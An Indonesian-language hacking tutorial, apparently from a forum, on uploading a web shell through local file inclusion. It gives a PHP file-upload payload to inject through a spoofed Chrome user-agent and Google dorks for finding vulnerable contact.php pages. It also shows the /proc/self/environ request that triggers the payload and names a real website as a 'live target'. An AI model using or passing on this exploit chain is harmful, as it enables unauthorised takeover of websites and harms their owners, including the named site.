Nah bro saya kasih tau cara upload Shell
via LFI hanya bisa di gunakan menggunakan google chrome karna bakal ada
setingan sedikit . browser yg lain kga tau coz blum cba :p
pertama yg belum punya chrome download di sini http://www.google.com/chrome/
jika sudah di install cromenya pergi ke https://chrome.google.com/webstore/detai...pkjnoahfmg
kalau sudah , add to chrome
stelah itu klik di sebelah kanan pojok " chrome Us Spoofer" (Icon File bertopeng) ,kita setting
kolom pertama atau di kotak New User-agent name kita ketik lfi
kolom ke-dua atau di kotak New User-Agent String isi dengan script
<?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']);
?><p>zero-security</p><br> <form action=""
method="post" enctype="multipart/form-data">Filename: <input
type="file" name="file" /><input type="submit" value="Submit"
/>
kolom ke-tiga atau kotak Group ketik LFI
kolom ke-empat atau kotak Indicator Flag ketik lfi .
setelah itu klik add
settingan selesai :)
dork ( bisa di kembangkn lgi ) :
allinurl:pg=contact.php
allinurl:page=contact.php
allinurl:home=contact.php
cara hacknya yaitu menambahkan kode %2Fproc%2Fself%2Fenviron
contoh http:target.com/index.php?page=
%2Fproc%2Fself%2Fenviron
nahh klo vuln pasti ada buat uploadnya
LIVE target
http://www.hnos-perez.com/index.php?page...%2Fenviron
Sumber
Translite
Contact Me
